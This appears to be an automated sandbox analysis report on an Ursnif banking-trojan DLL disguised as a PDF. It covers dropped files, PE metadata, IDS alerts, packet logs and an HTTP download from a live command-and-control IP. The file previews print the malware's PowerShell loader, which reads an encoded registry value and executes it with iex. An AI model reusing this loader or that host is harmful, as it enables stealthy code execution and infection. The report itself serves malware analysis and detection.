                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                      C:\Users\user\Documents\20220428\PowerShell_transcript.123716.e+y1bmjH.20220428154848.txt

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1369
                      Entropy (8bit):5.38941265664502
                      Encrypted:false
                      SSDEEP:24:BxSAs7vBVLEZx2DOXUWxA+LCHcuI4qW3rHjeTKKjX4CIym1ZJX+A+LCHcuI41nxD:BZAvTLkoORSct4t3rqDYB1ZQSct4pZZ9
                      MD5:D9093AED9770C375F369883F57265233
                      SHA1:0726E4AB10F9CFB6CD04081A67150798319CB791
                      SHA-256:26F128A04C053E8AABB0E61617E0D02F8E418E0CA88E83E668071FA5974212CB
                      SHA-512:E8705514CC712818F52EBF05BA812475320069A556C8E0C86D40D3948BBFC793C7AF816E5A4D8C9457E0C62B8B2162CD6DE74FEC884692DDF62568BACD66D1A8
                      Malicious:false
                      Preview:.**********************..Windows PowerShell transcript start..Start time: 20220428154853..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 123716 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 6636..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220428154853..**********************..PS>new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; t

                      C:\Users\user\TestLocal.ps1

                      Download File
                      Process:C:\Windows\explorer.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):232
                      Entropy (8bit):5.42163455994357
                      Encrypted:false
                      SSDEEP:6:QH51se4itKzTHLgyKBM34H6sw83F1tu4r9iyeqmM:Q7se4hzjLgyaI4HRlA4cyeHM
                      MD5:70E01C3AEC813421C5432829211FF0E5
                      SHA1:DFBBDD9C71D466333E270EFC575D89FE6DDA7605
                      SHA-256:B64921C4F67BC033A6FEC1581A35C76C5DC74EF9189DDCB35D55949D018E41A1
                      SHA-512:5EC463A9C601E5CBCAB88E5D478C9E04FA49420E5A51ACCA197A042CEC668C203B20D350A134F840A48808CA3B15BD33064AF51F5B3D22C13E0AEDCC5B5ED965
                      Malicious:false
                      Preview:new-alias -name dvjacwsnv -value gp;new-alias -name birkodkre -value iex;birkodkre ([System.Text.Encoding]::ASCII.GetString((dvjacwsnv "HKCU:\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))

                      C:\Users\user\WhiteBook.lnk

                      Download File
                      Process:C:\Windows\explorer.exe
                      File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
                      Category:dropped
                      Size (bytes):838
                      Entropy (8bit):3.073236880282747
                      Encrypted:false
                      SSDEEP:12:8glVm/3BVSXvk44X3ojsqzKtnWNaVgiNL4t2Y+xIBjK:8p/BHYVKVWiV57aB
                      MD5:CA1C201059C5BFD5900F5EB2466883CC
                      SHA1:BF3670A8C06A4FABC5C410F368E178B353F9166C
                      SHA-256:E5717E89B0D46C5E89F39410FA7A9DE94AA6A3301F8AC920F84F1A7179554085
                      SHA-512:2273AF46D41B9698B23AEADD8EFBEF80017CFD465B4347CFB99C2FEAE371F39A511288AA64AAFA2E35DD2AD883D8E43D70A65E62C18977C6C6D85E3153041D4C
                      Malicious:false
                      Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....Z.1...........System32..B............................................S.y.s.t.e.m.3.2.....t.1...........WindowsPowerShell.T............................................W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l... .N.1...........v1.0..:............................................v.1...0.....l.2...........powershell.exe..N............................................p.o.w.e.r.s.h.e.l.l...e.x.e...........\.p.o.w.e.r.s.h.e.l.l...e.x.e.........%...............wN....]N.D...Q..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.................

                      Static File Info

                      General

                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):6.102128737370747
                      TrID:
                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                      • Generic Win/DOS Executable (2004/3) 0.20%
                      • DOS Executable Generic (2002/1) 0.20%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:626a97fea05c8.pdf.dll
                      File size:618496
                      MD5:76f9a5c65f372960c55a3e2d19d211cb
                      SHA1:341d52557b6600d3e3fe30a43de94206eb4e4403
                      SHA256:713cfe3bc8dd8f8ba3b907d9268d3f4bd40f5a6a681653cc7922bf69a754ee5a
                      SHA512:d38596650718f4060bc63ddc1fda8ff4cec3550d2781cf12f790be9b858c4f9e65c8406dc17d95b8fb84689e3c028c4e225f74d613b0e92daf25e6be2526b420
                      SSDEEP:6144:eBbkmU1vOuplJjdX8vxxaYuQ1n79lmdrjhXccbwD1Yl/R0odd6MbBCKaDaabuFGs:iUJVpXjcgQ1n7DQjbES/OodJ+xS
                      TLSH:E7D4E029C7501A6AD81537791899803F0A39F978E32F70EF26847D6FB50A6F05A34F39
                      File Content Preview:MZ......................@...................................,...........!..L.!This program cannot be run in DOS mode....$........I.R.(n..(n..(n......(n..z...(n..P...(n.fLj..(n..vl..(n..z...(n..P...(n.._...(n..z...(n..z...(n......(n.fLk..(n..z...(n..z...(n

                      File Icon

                      Icon Hash:9068eccc64f6e2ad

                      Static PE Info

                      General

                      Entrypoint:0x401023
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      DLL Characteristics:TERMINAL_SERVER_AWARE
                      Time Stamp:0x411096D1 [Wed Aug 4 07:57:05 2004 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:0
                      File Version Major:5
                      File Version Minor:0
                      Subsystem Version Major:5
                      Subsystem Version Minor:0
                      Import Hash:de44747c447d17324a209c20a63c5698

                      Entrypoint Preview

                      Instruction
                      jmp 00007F30DC726DBDh
                      jmp 00007F30DC757438h
                      jmp 00007F30DC726B33h
                      jmp 00007F30DC72690Eh
                      jmp 00007F30DC726BB9h
                      jmp 00007F30DC726794h
                      jmp 00007F30DC75C97Fh
                      jmp 00007F30DC7268BAh
                      jmp 00007F30DC74FDE5h
                      jmp 00007F30DC75FC20h
                      jmp 00007F30DC75B83Bh
                      jmp 00007F30DC760D26h
                      jmp 00007F30DC726841h
                      jmp 00007F30DC750F7Ch
                      jmp 00007F30DC7634A7h
                      jmp 00007F30DC75A792h
                      jmp 00007F30DC751FCDh
                      jmp 00007F30DC7655E8h
                      jmp 00007F30DC7269C3h
                      jmp 00007F30DC76214Eh
                      jmp 00007F30DC758619h
                      jmp 00007F30DC752FE4h
                      jmp 00007F30DC761D7Fh
                      jmp 00007F30DC726B1Ah
                      jmp 00007F30DC75DA25h
                      jmp 00007F30DC755330h
                      jmp 00007F30DC76557Bh
                      jmp 00007F30DC7541F6h
                      jmp 00007F30DC726B11h
                      jmp 00007F30DC72681Ch
                      jmp 00007F30DC75EB57h
                      jmp 00007F30DC7644C2h
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3

                      Rich Headers

                      Programming Language:
                      • [IMP] VS2012 UPD4 build 61030
                      • [ C ] VS2013 UPD2 build 30501
                      • [IMP] VS2013 UPD3 build 30723
                      • [IMP] VS2010 SP1 build 40219
                      • [C++] VS2013 build 21005
                      • [RES] VS2008 build 21022
                      • [IMP] VS2013 build 21005
                      • [LNK] VS2015 UPD3.1 build 24215
                      • [EXP] VS2008 build 21022
                      • [ C ] VS2013 UPD3 build 30723
                      • [C++] VS2017 v15.5.4 build 25834
                      • [RES] VS2013 build 21005
                      • [ C ] VS2017 v15.5.4 build 25834

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x8a0000xa0.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x8b0000xc100.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x980000x1010.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x400000x38.rdata
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x8a2ac0x20c.idata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x10000x1.text
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x3efe00x3f000False0.37589905754data4.45973641251IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .rdata0x400000x3fb5f0x40000False0.815296173096data7.22909869521IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0x800000x95370x7000False0.327253069196data5.46985224262IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .idata0x8a0000x98d0x1000False0.2060546875data2.48883672307IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .rsrc0x8b0000xc1000xd000False0.465106670673data5.38059585556IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x980000x17d70x2000False0.237915039062data3.90488138375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountry
                      RT_BITMAP0x8b5100x666dataEnglishUnited States
                      RT_ICON0x8bb780x485dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                      RT_ICON0x903d80x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544EnglishUnited States
                      RT_ICON0x929800xea8dataEnglishUnited States
                      RT_ICON0x938280x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                      RT_ICON0x940d00x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                      RT_DIALOG0x946380xb4dataEnglishUnited States
                      RT_DIALOG0x946f00x120dataEnglishUnited States
                      RT_DIALOG0x948100x158dataEnglishUnited States
                      RT_DIALOG0x949680x202dataEnglishUnited States
                      RT_DIALOG0x94b700xf8dataEnglishUnited States
                      RT_DIALOG0x94c680xa0dataEnglishUnited States
                      RT_DIALOG0x94d080xeedataEnglishUnited States
                      RT_GROUP_ICON0x94df80x4cdataEnglishUnited States
                      RT_VERSION0x94e480x290MS Windows COFF PA-RISC object fileEnglishUnited States

                      Imports

                      DLLImport
                      msvcrt.dllfgetwc, strcoll, srand
                      GDI32.dllGetBkColor, ExtSelectClipRgn, GetTextMetricsW, GetCharWidthFloatA, GetCharWidth32A, GetTextCharacterExtra, GetCharWidthA, GdiComment
                      KERNEL32.dllGetStringTypeA, WriteProcessMemory, GetCommTimeouts, GetConsoleCP, EnumResourceTypesA, GlobalFlags, GetFileTime, GetThreadLocale, LocalHandle, GetLargestConsoleWindowSize, EraseTape, GetDiskFreeSpaceExA, lstrlenA, GlobalMemoryStatus, GetModuleFileNameA, GetBinaryTypeA, DebugBreak
                      ADVAPI32.dllRegGetValueA, GetFileSecurityA, EnumServicesStatusExW, InitiateSystemShutdownExW
                      mscms.dllGetColorDirectoryW
                      USER32.dllGetClientRect, GetClassNameA, GetPropW, GetScrollBarInfo, DeleteMenu, MessageBoxIndirectW, GetMenuItemRect, GetMessagePos, DefMDIChildProcW, GetUpdateRgn, LoadMenuA, GetQueueStatus, GetMessageW
                      OLEAUT32.dllLoadTypeLibEx, GetRecordInfoFromTypeInfo

                      Version Infos

                      DescriptionData
                      LegalCopyright A Company. All rights reserved.
                      InternalName
                      FileVersion1.0.0.0
                      CompanyNameA Company
                      ProductName
                      ProductVersion1.0.0.0
                      FileDescription
                      OriginalFilenamemyfile.exe
                      Translation0x0409 0x04b0

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      04/28/22-15:48:15.506658 04/28/22-15:48:15.506658TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4974580192.168.2.613.107.42.16
                      04/28/22-15:48:37.609595 04/28/22-15:48:37.609595TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975080192.168.2.694.140.115.8

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Apr 28, 2022 15:48:35.629452944 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:35.700856924 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:35.701092005 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:35.804402113 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:35.885364056 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.234626055 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.234668016 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.234692097 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.234714031 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.234738111 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.234759092 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.234777927 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.234802961 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.234829903 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.234844923 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.234857082 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.234869003 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.234951019 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.236869097 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.305238962 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.305269957 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.305293083 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.305310011 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.305335999 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.305360079 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.305377007 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.305402994 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.305418015 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.305434942 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.305445910 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.305465937 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.305473089 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.305490017 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.305497885 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.305526018 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.305526972 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.305541992 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.305551052 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.305577993 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.305597067 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.342711926 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.342762947 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.342884064 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.342967987 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.342998981 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.343014002 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.343027115 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.343031883 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.343038082 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.343059063 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.343065023 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.343099117 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.383433104 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.383465052 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.383481026 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.383496046 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.383582115 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.383630991 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.396562099 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.396595001 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.396617889 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.396636009 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.396655083 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.396677971 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.396697044 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.396703959 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.396724939 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.396747112 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.396749020 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.396780014 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.396801949 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.397918940 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.397943974 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.397964001 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.397999048 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.398030043 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.464060068 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.464096069 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.464114904 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.464138985 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.464162111 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.464183092 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.464216948 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.464274883 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.464622974 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.464647055 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.464665890 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.464711905 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.464747906 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.465253115 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.465276957 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.465296030 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.465348005 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.465379000 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.475095987 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.475246906 CEST4975080192.168.2.694.140.115.8
                      Apr 28, 2022 15:48:36.546885967 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.546935081 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.546960115 CEST804975094.140.115.8192.168.2.6
                      Apr 28, 2022 15:48:36.546987057 CEST804975094.140.115.8192.168.2.6

                      HTTP Request Dependency Graph

                      • 94.140.115.8

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.64975094.140.115.880C:\Windows\SysWOW64\rundll32.exe
                      TimestampkBytes transferredDirectionData
                      Apr 28, 2022 15:48:35.804402113 CEST1147OUTGET /drew/LtgGoR4W/2VkXik7fjDcVktkLvg4IApw/X92UzCdVgy/XGxL6WnODxABmAmav/eQYJObhAwpfD/VdmVLoyMEHz/dwiltyOKA4QHrd/HIJmqKTpq7hYAhh7xdD_2/BebjcoubFQh657nc/ksw26clyZ6v7ljU/oLbDPDTt1qYXqZfF_2/Fct2ocSBw/YaWKTOq17vIwu56czhmj/mDU1dku9eqq5aKu5F_2/FjqClysn2ko_2Fsx8SaFZF/ugZkpFnnMo_2B/poGcHSuZrc7hSygj/D8.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 94.140.115.8
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Apr 28, 2022 15:48:36.234626055 CEST1149INHTTP/1.1 200 OK
                      Server: nginx/1.14.2
                      Date: Thu, 28 Apr 2022 13:48:36 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 186004
                      Connection: keep-alive
                      Pragma: public
                      Accept-Ranges: bytes
                      Expires: 0
                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                      Content-Disposition: inline; filename="626a9b342b5f5.bin"
                      Data Raw: 82 b0 5a f9 80 5c 88 d2 b9 a9 03 66 fc cb 05 5a 55 e1 a3 0c 1d f4 74 76 10 8c be b1 96 6a c9 05 cb 3a 20 f7 40 97 8d cf 82 7e d8 63 47 d6 66 53 a2 b2 df 46 50 eb 66 05 3b 69 3c 4e e7 2d b7 c5 9a 11 b9 f1 b6 05 bd 93 ed 4a 54 06 08 f8 24 04 14 8b 92 a3 63 12 78 a9 c3 92 cb d4 7c 87 14 e4 63 d4 05 20 f9 3c 6a 5f f1 7e 65 84 63 e2 4e 82 6e 48 23 ef 28 da 52 05 8e fb 30 d8 02 06 d9 d3 14 82 03 b0 45 35 de 9c 1f 71 d0 9b 3a c9 80 0c 04 e9 c4 55 c2 8e 9b 6b 71 37 e2 ab 42 c6 3a 26 d7 99 03 87 ed 51 05 fb a8 a8 86 c5 a1 e5 48 fd 9b 55 b0 f2 2d 73 08 e3 2f 3a bb 98 30 78 3c 0f 13 bf 4c 26 40 74 75 92 a2 bf 07 20 f8 3f 0a 84 8a ab fc df cf 71 74 b4 60 79 99 09 2d 7f 82 52 87 b6 5b 77 e2 98 6c 4b 07 fc 75 8b 6f 2e 0c 46 a5 fb cb 29 1a fd d8 c3 8d d4 6e 88 55 e5 34 e2 23 de c9 96 57 7e 4d 02 39 75 cb 23 c3 1e b7 9a d8 de 82 90 27 64 d6 fb 51 22 ec 6d 93 97 e8 7d 81 8c 5e 56 ae a1 23 f9 43 ad c1 0e 4c 7e 2f f7 4a f9 22 7c 26 e9 77 05 f2 81 80 74 bc 08 25 7f 80 7f c4 eb 84 4c ac 58 d2 03 f0 4a 39 cc 31 80 de 78 83 47 b7 4e c4 b8 56 a8 ad 9c 7d 09 0a 70 63 f8 9f 4a 53 24 3f 4a c8 58 39 a2 b7 9c 4a ef 6e 4a 5b f4 22 58 ba 98 04 7a 10 d5 aa fe 88 33 0c e5 14 16 6f 60 a5 50 24 b4 2a 29 d7 6b f0 76 b1 e2 fd fc 14 f6 86 09 f4 cc d3 9d f7 2e fd 1f f4 a0 ca fe e7 27 dd 71 dd dd 64 b5 31 24 30 94 6c ba 10 fc 1c dc 1d bb e6 97 84 46 58 ca 9c e6 ed 19 10 f6 cf a1 08 89 ff c8 d5 aa 0e 42 31 98 56 c5 75 60 2d ab e7 b0 3d a1 48 ed 3e 89 1b 2c 21 10 57 45 6e 61 aa 8f a5 ad a1 66 2b e2 ac 70 4f 75 c1 65 d0 45 ef 80 32 2b 20 e4 d8 4a da ea 62 0b 77 45 56 1d 01 fe 80 42 8f 6b 26 4f 6c 1d 53 82 9a 60 a2 db 4f fe 2c 50 1a 2b d0 73 cc 11 05 db 08 70 85 06 1f 8b 9c ea 4c f8 36 5a 6e a6 0e e3 02 59 b7 d5 cd 3b 24 ed d7 bf 65 b2 8a 84 7c 35 da 68 c0 2e cc 63 4e 6c b6 71 9a 51 95 6a 9a e1 e1 78 fb 92 40 9d 77 c6 d0 9a 02 5e fd e5 ca 48 a1 d1 c9 3f 81 de 26 d8 62 71 f2 91 36 fd 34 7c d5 0e 3e 11 7a 05 b6 84 b3 01 33 13 f0 a5 86 ee 24 b7 1e 71 3d 73 98 0c 6b 3b b1 21 28 04 71 0f da 1c 37 6e 5e 3f 29 06 e4 e0 6e c1 7d 2b a8 1e d9 fe e8 ae c8 27 e7 2f 17 f9 20 25 24 3f de 68 e7 f5 24 79 71 22 a2 52 95 43 c5 05 f4 4f 1b 7a a6 b9 2d c8 2a d5 3d 92 db 83 04 55 20 07 68 f7 3b 47 1a 47 62 e6 0a 9a ab c2 3a f9 95 2b 59 ff 50 44 c0 bd 3c d4 39 74 20 a7 fc bf d9 ab b2 a7 e4 4d ee 69 b4 4e 36 21 29 8a 39 0a ec 3b df 04 06 df 56 d4 10 92 74 a2 85 4c 1a d1 61 18 59 70 75 4e e9 ac 21 f0 9e e9 3c 7d 93 a9 4e ad 40 74 f0 cd 04 23 85 d8 62 16 75 5c 97 69 e3 16 65 d3 46 da 89 df 99 fb 57 32 2f b1 f2 35 24 bc d7 6d f5 01 bc ea fb a7 7d c5 d7 94 77 f9 50 ae 5d 7f 68 db 96 fa 5d 2d 47 68 bb 5d a9 41 93 11 90 87 87 82 32 7a ff 01 7a 72 5b b5 f2 b9 99 e6 32 1f 64 f2 b6 90 76 93 18 1b 0f ef 4c 57 80 cf 3a 59 8f b4 c3 d5 fc d2 cb c6 f9 01 4d c9 51 08 61 7a ad 91 e5 16 b0 ba 70 85 d9 7c 5d 96 9b 20 c5 23 f7 93 32 8d 34 8f 3d 39 c5 81 cf 4a 0b a6 f8 bc be 1b 